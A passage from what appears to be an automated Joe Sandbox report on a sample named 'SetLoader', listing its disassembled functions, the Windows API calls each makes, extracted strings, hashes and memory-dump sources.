                                              • Opcode ID: 0d97c896962943c382b3170a43798a8d2eab6d6ec2b460b90b28ca344828cdf5
                                              • Instruction ID: aaf9e06ffcc21920b90501862ae1a73b1e1958d3c0445596390a66564105ac87
                                              • Opcode Fuzzy Hash: 0d97c896962943c382b3170a43798a8d2eab6d6ec2b460b90b28ca344828cdf5
                                              • Instruction Fuzzy Hash: 9AA0113808000A8ACE002B30CA0800C3B22EB22BC030022A8A00BCA0A2CB22880B8A02
                                              Function 0062CBB6 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0062CBBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID:
                                              • API String ID: 1611563598-0
                                              • Opcode ID: de2d65f119c3842ccae9a1551458973b8ebc99fa5b9dc372f3b3d1a274d194af
                                              • Instruction ID: ffd1b6503bd043d0fc80031a23ddff853341ecd2734b5adcb477002c60083b17
                                              • Opcode Fuzzy Hash: de2d65f119c3842ccae9a1551458973b8ebc99fa5b9dc372f3b3d1a274d194af
                                              • Instruction Fuzzy Hash: B6A011B02002008BA3000B32CF0AA0EBAAAAFA3A00F00C028B00280030CB3288B0AA02

                                              Non-executed Functions

                                              Function 0062EA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0062D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0062D6C7
                                                • Part of subcall function 0062C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0062C5E5
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,5CB4B331,?,00000000,00000001), ref: 0062EB53
                                              • _wcslen.LIBCMT ref: 0062EB8D
                                              • _wcslen.LIBCMT ref: 0062EBA1
                                              • _wcslen.LIBCMT ref: 0062EBC6
                                              • GetFileAttributesW.KERNEL32(?), ref: 0062EC0C
                                              • DeleteFileW.KERNEL32(?), ref: 0062EC1E
                                              • _swprintf.LIBCMT ref: 0062EC43
                                              • GetFileAttributesW.KERNEL32(?), ref: 0062EC52
                                              • MoveFileW.KERNEL32(?,?), ref: 0062EC6B
                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0062EC7F
                                              • _wcslen.LIBCMT ref: 0062ECFA
                                              • _wcslen.LIBCMT ref: 0062ED03
                                              • SetWindowTextW.USER32(?,?), ref: 0062ED62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                              • API String ID: 2983673336-312220925
                                              • Opcode ID: 9d482cc6cec4662cc66c33fd7b55faebe1ace91138f2d06f94bac8ebfce76d43
                                              • Instruction ID: feb4fb86fea93b929cd551de1ec7acdce433cbc9e67e37d426100fa3e0e2c1dd
                                              • Opcode Fuzzy Hash: 9d482cc6cec4662cc66c33fd7b55faebe1ace91138f2d06f94bac8ebfce76d43
                                              • Instruction Fuzzy Hash: 05F18F72900669AACB31EFA0EC55EEF33BEEF09310F04043AF909D7150EB719A458B54
                                              Function 0062E560 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 240windowfileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0062E602
                                              • GetDlgItem.USER32(?,0000006C), ref: 0062E631
                                              • SetFocus.USER32(00000000), ref: 0062E638
                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0062E66C
                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0062E69F
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0062E6B5
                                                • Part of subcall function 0062CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CBEE
                                                • Part of subcall function 0062CBC8: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0062CC05
                                                • Part of subcall function 0062CBC8: SystemTimeToFileTime.KERNEL32(?,?), ref: 0062CC19
                                                • Part of subcall function 0062CBC8: FileTimeToSystemTime.KERNEL32(?,?), ref: 0062CC2A
                                                • Part of subcall function 0062CBC8: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0062CC42
                                                • Part of subcall function 0062CBC8: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,00000000,00000032), ref: 0062CC66
                                                • Part of subcall function 0062CBC8: _swprintf.LIBCMT ref: 0062CC85
                                              • _swprintf.LIBCMT ref: 0062E704
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0062E717
                                              • FindClose.KERNEL32(00000000), ref: 0062E71E
                                              • _swprintf.LIBCMT ref: 0062E773
                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0062E786
                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0062E7A0
                                              • _swprintf.LIBCMT ref: 0062E7D9
                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0062E7EC
                                              • _swprintf.LIBCMT ref: 0062E83C
                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0062E84F
                                                • Part of subcall function 0062D0AB: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0062D0E1
                                                • Part of subcall function 0062D0AB: GetNumberFormatW.KERNEL32(00000400,00000000,?,0065272C,?,?), ref: 0062D12A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                              • String ID: %s %s$-c$REPLACEFILEDLG
                                              • API String ID: 662400606-4208485940
                                              • Opcode ID: fb0107a9ec8c33c3cc861b03a876ad72d56c414ab0c40afc2a21573fdc89f7f5
                                              • Instruction ID: 7bd14102546f0d211c64b44e710b61462eefffc22f98141e9cf724b9db6a07cf
                                              • Opcode Fuzzy Hash: fb0107a9ec8c33c3cc861b03a876ad72d56c414ab0c40afc2a21573fdc89f7f5
                                              • Instruction Fuzzy Hash: 2F71E8B2648714BBE3709B60EC49FFF779EEB89700F04082DF64DD6181DA7699448B62
                                              Function 00617FD3 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 365fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061807F
                                              • _wcslen.LIBCMT ref: 00618112
                                                • Part of subcall function 00618C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                                • Part of subcall function 00618C95: OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                                • Part of subcall function 00618C95: GetLastError.KERNEL32 ref: 00618CF6
                                                • Part of subcall function 00618C95: CloseHandle.KERNEL32(?), ref: 00618D05
                                                • Part of subcall function 0061BC65: DeleteFileW.KERNELBASE(?,?,?,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061BC82
                                                • Part of subcall function 0061BC65: DeleteFileW.KERNEL32(?,?,?,00000800,?,0061B14B,?,00000000,0061AF6E,5CB4B331,00000000,0064517A,000000FF,?,00618882,?), ref: 0061BCAE
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 006181C1
                                              • CloseHandle.KERNEL32(00000000), ref: 006181DD
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000,?,?,?,?,?,?,?,5CB4B331,00000000), ref: 00618329
                                                • Part of subcall function 0061B7E2: FlushFileBuffers.KERNEL32(?), ref: 0061B7FC
                                                • Part of subcall function 0061B7E2: SetFileTime.KERNELBASE(?,?,?,?), ref: 0061B8B0
                                                • Part of subcall function 0061AFD0: FindCloseChangeNotification.KERNELBASE(?,?,?,0061AF75,5CB4B331,00000000,0064517A,000000FF,?,00618882,?,?), ref: 0061AFEB
                                                • Part of subcall function 0061C2E5: SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,0061BF5E,?,?), ref: 0061C305
                                                • Part of subcall function 0061C2E5: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0061BF5E,?,?), ref: 0061C334
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushLastNotificationOpenTimeToken
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                              • API String ID: 1577582944-3508440684
                                              • Opcode ID: d964b811a7428c27c7a6195af9dc4aa884c6cc9dc15cc5de6c9c9cc3bb2b213e
                                              • Instruction ID: 4312263a233e8c0669a8d7342fb371d20f2f9ad9299c371753af0a4583e619d4
                                              • Opcode Fuzzy Hash: d964b811a7428c27c7a6195af9dc4aa884c6cc9dc15cc5de6c9c9cc3bb2b213e
                                              • Instruction Fuzzy Hash: 36D1A8B1900249AFDB25DFA0CC41BEEB7AEBF05700F08451EFA55E7241DB74AA84C7A5
                                              Function 0063FF3E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: cd457cda8bb6db918238a4229004bb69e6d424bf0e5b55dd2fdc5596c2b71844
                                              • Instruction ID: 67e136dd4dbaee02c602891ec5225b5d03df82e3613535e55fb923a6306e0862
                                              • Opcode Fuzzy Hash: cd457cda8bb6db918238a4229004bb69e6d424bf0e5b55dd2fdc5596c2b71844
                                              • Instruction Fuzzy Hash: E4C27E71E086288FEB65CF28DD407EAB7B6EB85304F1541EAD90DE7241E775AE818F40
                                              Function 00613AB7 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 677COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _swprintf
                                              • String ID: CMT$P'a$h%u$hc%u
                                              • API String ID: 589789837-1875271218
                                              • Opcode ID: c310d7eb94473fed7c5dd676e929bd15cf917b3a978e61a34b191ffd34fad76f
                                              • Instruction ID: 65f5fe91b1d19a7dbbff833ef87b5e41727bf7cdb9dc7aeb2e1e74df5365ea29
                                              • Opcode Fuzzy Hash: c310d7eb94473fed7c5dd676e929bd15cf917b3a978e61a34b191ffd34fad76f
                                              • Instruction Fuzzy Hash: 8B42D2719052449ADF24DF74C895BEE7BA6AF15300F0C047DFC5A9B282DB70AAC9CB61
                                              Function 00631FCA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00631FD6
                                              • IsDebuggerPresent.KERNEL32 ref: 006320A2
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006320C2
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 006320CC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                              • String ID:
                                              • API String ID: 254469556-0
                                              • Opcode ID: 6d3ff6b02018497cf762b4ea40b0238d3d962c9cce8b7069f4989e3f65abe4a9
                                              • Instruction ID: daf37903c281f385b3634f76c8fa68547bc3c0f54f689bee91470ef18e5c1aa3
                                              • Opcode Fuzzy Hash: 6d3ff6b02018497cf762b4ea40b0238d3d962c9cce8b7069f4989e3f65abe4a9
                                              • Instruction Fuzzy Hash: 6D312B75D053199BDB60DFA4D9897CCBBB8BF05300F1040AAE50DAB250EB715A84CF45
                                              Function 00630B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • VirtualQuery.KERNEL32(80000000,00630AC5,0000001C,00630CBA,00000000,?,?,?,?,?,?,?,00630AC5,00000004,00675D24,00630D4A), ref: 00630B91
                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00630AC5,00000004,00675D24,00630D4A), ref: 00630BAC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: InfoQuerySystemVirtual
                                              • String ID: D
                                              • API String ID: 401686933-2746444292
                                              • Opcode ID: 57628bdcb27816c3488d4d32e0b177893ff229be2ab26a80f9d9455493711fd1
                                              • Instruction ID: 2bc5309bea9611ffe632fc1a21626ffaff5336d74597d80f50d4eafdbdf05817
                                              • Opcode Fuzzy Hash: 57628bdcb27816c3488d4d32e0b177893ff229be2ab26a80f9d9455493711fd1
                                              • Instruction Fuzzy Hash: DF01D472600109ABDB14DF29DC15BDEBBAAAFC5328F08C124AD5AD7244D634E805C6C0
                                              Function 0063647F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00636577
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00636581
                                              • UnhandledExceptionFilter.KERNEL32(0063B700,?,?,?,?,?,00000000), ref: 0063658E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: d9b1af0749f9daf370f62d5836ecec115b155a4ce9be21de589313f85835606e
                                              • Instruction ID: 8bf5796001833840f26247962fa6e2450b3fe1c9b7d6e7993ca2e39f5b97317d
                                              • Opcode Fuzzy Hash: d9b1af0749f9daf370f62d5836ecec115b155a4ce9be21de589313f85835606e
                                              • Instruction Fuzzy Hash: 0631F474901228ABCB61DF28D9897CCBBB9BF08310F1041EAF80CA7251E7309F858F94
                                              Function 0063A640 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0063B5C6,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000,?,0063B5C6), ref: 0063A661
                                              • TerminateProcess.KERNEL32(00000000,?,0063A616,0063B5C6,0064F7B0,0000000C,0063A76D,0063B5C6,00000002,00000000,?,0063B5C6), ref: 0063A668
                                              • ExitProcess.KERNEL32 ref: 0063A67A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 1bfbf5a39a374cd0fd67fb503b2820c483457f3815b2375a34297fdd468febc0
                                              • Instruction ID: 3ab8497012543b94052d9d616d9018ec6064366241af44425e160e029211dfb9
                                              • Opcode Fuzzy Hash: 1bfbf5a39a374cd0fd67fb503b2820c483457f3815b2375a34297fdd468febc0
                                              • Instruction Fuzzy Hash: 82E0B635440148AFCF116FA4DE0AA8C3B6BEB43745F044414F8498B232CB36ED46DA96
                                              Function 0063FA90 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                              • Instruction ID: 9b13599dcf7a4d8a27970a6f122e6296299ff2959b289de9893e4bca04ba82cc
                                              • Opcode Fuzzy Hash: ce33ea9f4ec23801448980fb748551bc40d278e625499f9c7663d63746eea6e2
                                              • Instruction Fuzzy Hash: BC021C71E002199BDF14CFA9C8806EEF7F2EF48314F25826AD919E7385D731AE418B94
                                              Function 0062D0AB Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0062D0E1
                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,0065272C,?,?), ref: 0062D12A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FormatInfoLocaleNumber
                                              • String ID:
                                              • API String ID: 2169056816-0
                                              • Opcode ID: e361af8c12211734673ca3cc86031789784e6171c81268f750041ac6607e1c04
                                              • Instruction ID: 178116a07700d22d9f81e03241bf4313ed190ee103edb2be8a9feb8b2ea9c23b
                                              • Opcode Fuzzy Hash: e361af8c12211734673ca3cc86031789784e6171c81268f750041ac6607e1c04
                                              • Instruction Fuzzy Hash: E511CB79200318ABC701DF64EC42BAA73BAFF0D701F00942AF901E7290D770AA44CB69
                                              Function 00617BFF Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00617D6C,?,00000400), ref: 00617BFF
                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00617C20
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
